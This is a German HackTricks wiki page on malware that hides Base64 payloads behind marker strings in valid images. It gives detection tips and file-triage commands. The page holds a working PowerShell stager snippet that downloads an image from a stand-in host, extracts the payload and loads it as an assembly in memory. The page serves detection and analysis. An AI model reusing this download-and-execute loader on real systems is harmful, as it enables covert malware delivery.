Malware & Netzwerk-Stego

Tip

Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Lernen & üben Sie Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Unterstützen Sie HackTricks

Nicht alle Steganographie ist pixel‑LSB; Commodity-Malware versteckt häufig Payloads in ansonsten gültigen Dateien.

Praktische Muster

Durch Marker abgegrenzte Payloads in gültigen Bildern

Wenn ein Bild heruntergeladen und von einem Script sofort als Text/Base64 geparst wird, ist die Payload oft marker‑abgegrenzt statt pixel‑versteckt.

Commodity Loader verstecken zunehmend Base64-Payloads als Klartext in ansonsten gültigen Bildern (häufig GIF/PNG). Statt pixel‑basierter LSB wird die Payload durch eindeutige Marker-Strings abgegrenzt, die in Datei‑Text/Metadaten eingebettet sind. Ein Stager macht dann:

  • Lädt das Bild über HTTP(S) herunter
  • Findet Start-/Endmarker
  • Extrahiert den dazwischenliegenden Text und dekodiert ihn Base64
  • Lädt/führt in-memory aus

Minimaler PowerShell carving-Snippet:

$img = (New-Object Net.WebClient).DownloadString('https://example.com/p.gif')
$start = '<<sudo_png>>'; $end = '<<sudo_odt>>'
$s = $img.IndexOf($start); $e = $img.IndexOf($end)
if($s -ge 0 -and $e -gt $s){
$b64 = $img.Substring($s + $start.Length, $e - ($s + $start.Length))
$bytes = [Convert]::FromBase64String($b64)
[Reflection.Assembly]::Load($bytes) | Out-Null
}

Notes:

  • ATT&CK: T1027.003 (steganography)
  • Detection/hunting:
  • Scanne heruntergeladene Bilder auf Delimiter-Strings.
  • Markiere Skripte, die Bilder holen und sofort Base64-Decodierungsroutinen aufrufen (PowerShell FromBase64String, JS atob, etc).
  • Achte auf HTTP content-type mismatches (image/* response aber der Body enthält lange ASCII/Base64).

Other high-signal places to hide payloads

Diese sind typischerweise schneller zu prüfen als content-level pixel stego:

  • Metadaten: EXIF/XMP/IPTC, PNG tEXt/iTXt/zTXt, JPEG COM/APPn Segmente.
  • Trailing bytes: Daten, die nach dem formalen Endmarker angehängt sind (z. B. nach PNG IEND).
  • Embedded archives: ein ZIP/7z, das eingebettet oder angehängt ist und vom loader extrahiert wird.
  • Polyglots: Dateien, die so gefertigt sind, dass sie unter mehreren Parsern gültig sind (z. B. image + script + archive).

Triage commands

file sample
exiftool -a -u -g1 sample
strings -n 8 sample | head
binwalk sample
binwalk -e sample

Referenzen:

  • Unit 42 Beispiel: https://unit42.paloaltonetworks.com/phantomvai-loader-delivers-infostealers/
  • MITRE ATT&CK: https://attack.mitre.org/techniques/T1027/003/
  • Dateiformat-Polyglots und Container-Tricks: https://github.com/corkami/docs
  • Aperi’Solve (webbasierte Stego-Triage): https://aperisolve.com/

Tip

Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Lernen & üben Sie Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Unterstützen Sie HackTricks